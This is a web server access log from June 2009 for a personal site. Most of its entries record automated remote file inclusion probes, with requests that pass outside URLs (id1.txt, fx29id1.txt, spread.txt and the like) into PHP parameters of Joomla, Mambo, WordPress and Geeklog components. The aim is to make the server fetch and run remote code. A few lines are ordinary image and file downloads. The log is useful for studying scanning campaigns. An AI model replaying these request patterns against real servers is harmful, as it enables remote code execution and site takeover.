117.74.99.225 - - [21/Jun/2009:12:00:34 -0700] "GET /logs/access_080416.log%20%20/lib/base.php?BaseCfg[BaseDir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:00:41 -0700] "GET /logs/access_081117.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:00:52 -0700] "GET /index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:00:52 -0700] "GET /logs/access_080326.log%20%20/index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:00:52 -0700] "GET /logs/index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:00:52 -0700] "GET /logs/access_081123.log%20%20/index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:00:56 -0700] "GET /logs/access_080416.log/lib/base.php?BaseCfg[BaseDir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:01:07 -0700] "GET /logs/access_080404.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:01:07 -0700] "GET /logs/access_080510.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.78.238 - - [21/Jun/2009:12:01:09 -0700] "GET /logs/access_090108.log HTTP/1.0" 200 4230444 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.118.90.151 - - [21/Jun/2009:12:01:27 -0700] "GET /logs/access_080515.log/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.90.151 - - [21/Jun/2009:12:01:27 -0700] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.90.151 - - [21/Jun/2009:12:01:27 -0700] "GET /errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.90.151 - - [21/Jun/2009:12:01:28 -0700] "GET /logs/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:12:01:51 -0700] "GET /logs/access_080501.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:12:01:51 -0700] "GET /logs/access_080211.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:01:57 -0700] "GET /logs/access_080326.log/index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:01:57 -0700] "GET /logs/access_081123.log/index1.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.118.90.151 - - [21/Jun/2009:12:02:04 -0700] "GET /logs/access_080425.log/errors.php?error=http://a2222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:02:07 -0700] "GET /logs/access_080510.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:02:07 -0700] "GET /logs/access_080404.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:02:10 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:02:10 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:12:02:10 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:02:18 -0700] "GET /logs/access_090328.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:02:18 -0700] "GET /logs/access_090523.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:02:18 -0700] "GET /logs/access_090328.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.55.194 - - [21/Jun/2009:12:02:19 -0700] "GET /logs/access_090523.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:02:26 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20925 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:02:27 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:02:27 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:02:27 -0700] "GET /logs/access_080323.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:02:27 -0700] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.200.54 - - [21/Jun/2009:12:02:34 -0700] "GET /logs/access_080820.log///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:02:50 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [21/Jun/2009:12:02:51 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:02:55 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:03:00 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:03:12 -0700] "GET /logs/access_081117.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:04:02 -0700] "GET /logs/access_081117.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:04:31 -0700] "GET /logs/access_090109.log//galeria.php?start=0&kategoria=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:04:44 -0700] "GET /lib/base.php?BaseCfg[BaseDir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:04:44 -0700] "GET /logs/lib/base.php?BaseCfg[BaseDir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:04:44 -0700] "GET /logs/access_090128.log/lib/base.php?BaseCfg[BaseDir]=http://www.c21vox.tv/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:04:48 -0700] "GET /logs/access_080313.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:04:49 -0700] "GET /logs/access_080927.log/lib/base.php?BaseCfg[BaseDir]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:05:29 -0700] "GET /logs/access_090504.log%20%20/index2.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.248.10.200 - - [21/Jun/2009:12:05:29 -0700] "GET /index2.php?pg=http://www.ireland.cl//chat/inc/patServer/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:05:40 -0700] "GET /logs/access_071225.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:05:42 -0700] "GET /logs/access_071216.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:06:10 -0700] "GET /logs/access_080510.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:06:18 -0700] "GET /logs/access_081117.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.89.139 - - [21/Jun/2009:12:06:21 -0700] "GET /logs/access_080313.log//?path%5Bdocroot%5D=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.15.254.22 - - [21/Jun/2009:12:06:32 -0700] "GET /Geeklog/plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
121.15.254.22 - - [21/Jun/2009:12:06:32 -0700] "GET /logs//Geeklog/plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
121.15.254.22 - - [21/Jun/2009:12:06:32 -0700] "GET /logs/access_071215.log%20%20//Geeklog/plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:06:32 -0700] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:06:32 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:06:32 -0700] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:06:32 -0700] "GET /logs/access_090327.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:06:32 -0700] "GET /logs/access_081213.log%20%20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:06:32 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:06:32 -0700] "GET /logs/access_081213.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:06:32 -0700] "GET /logs/access_090327.log%20%20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:07:16 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:07:17 -0700] "GET /logs/access_081213.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:07:17 -0700] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [21/Jun/2009:12:07:18 -0700] "GET /logs/access_090327.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.c21vox.tv/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:07:28 -0700] "GET /logs/access_081226.log/index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:07:28 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:07:29 -0700] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:07:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.153.28.140 - - [21/Jun/2009:12:07:39 -0700] "GET /logs/access_081226.log/index.php?p=http://www.handy-porn.com/tranny/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:07:46 -0700] "GET /logs/access_080629.log/index.php?redir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:07:46 -0700] "GET /logs/index.php?redir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:07:47 -0700] "GET /logs/access_080815.log/index.php?redir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:07:48 -0700] "GET /logs/access_080510.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:12:07:48 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:07:49 -0700] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:07:49 -0700] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:07:50 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.201.208.50 - - [21/Jun/2009:12:07:58 -0700] "GET /logs/access_081117.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:08:02 -0700] "GET /index.php?redir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 20864 "-" "Mozilla/5.0" "www.dmulk.com"
85.237.201.58 - - [21/Jun/2009:12:08:30 -0700] "GET /logs/access_081213.log//?_zb_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.41 - - [21/Jun/2009:12:08:31 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
85.237.201.58 - - [21/Jun/2009:12:08:36 -0700] "GET /logs//?_zb_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 200 105055 "-" "libwww-perl/5.803" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:08:37 -0700] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:08:43 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:08:43 -0700] "GET /logs/access_080531.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:12:08:45 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
85.237.201.58 - - [21/Jun/2009:12:08:45 -0700] "GET /?_zb_path=http://lanaalaadi.com/gallery/data/media/2/3/db.txt?? HTTP/1.1" 200 21007 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.42 - - [21/Jun/2009:12:08:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:08:50 -0700] "GET /logs/access_080901.log%20%20/index.php?redir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [21/Jun/2009:12:08:51 -0700] "GET /logs/access_080815.log%20%20/index.php?redir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.162.115.67 - - [21/Jun/2009:12:08:55 -0700] "GET /logs/access_080320.log/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/spread.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.98.209.71 - - [21/Jun/2009:12:08:59 -0700] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 200 20917 "-" "Mozilla/5.0" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_4.jpg HTTP/1.1" 200 30204 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_7.jpg HTTP/1.1" 200 37670 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_6.jpg HTTP/1.1" 200 43164 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_9.jpg HTTP/1.0" 200 43994 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_32.jpg HTTP/1.1" 200 45744 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_31.jpg HTTP/1.1" 200 34412 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_30.jpg HTTP/1.1" 200 36022 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_3.jpg HTTP/1.1" 200 21490 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_29.jpg HTTP/1.1" 200 14396 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_28.jpg HTTP/1.1" 200 30909 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:02 -0700] "GET /bikes/dteel/EQ2/EQ2_27.jpg HTTP/1.1" 200 47213 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:03 -0700] "GET /bikes/dteel/EQ2/EQ2_33.jpg HTTP/1.1" 200 57210 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
68.7.228.225 - - [21/Jun/2009:12:09:03 -0700] "GET /bikes/dteel/EQ2/EQ2_8.jpg HTTP/1.1" 200 33710 "http://www.guildportal.com/Guild.aspx?GuildID=80731&TabID=695681" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
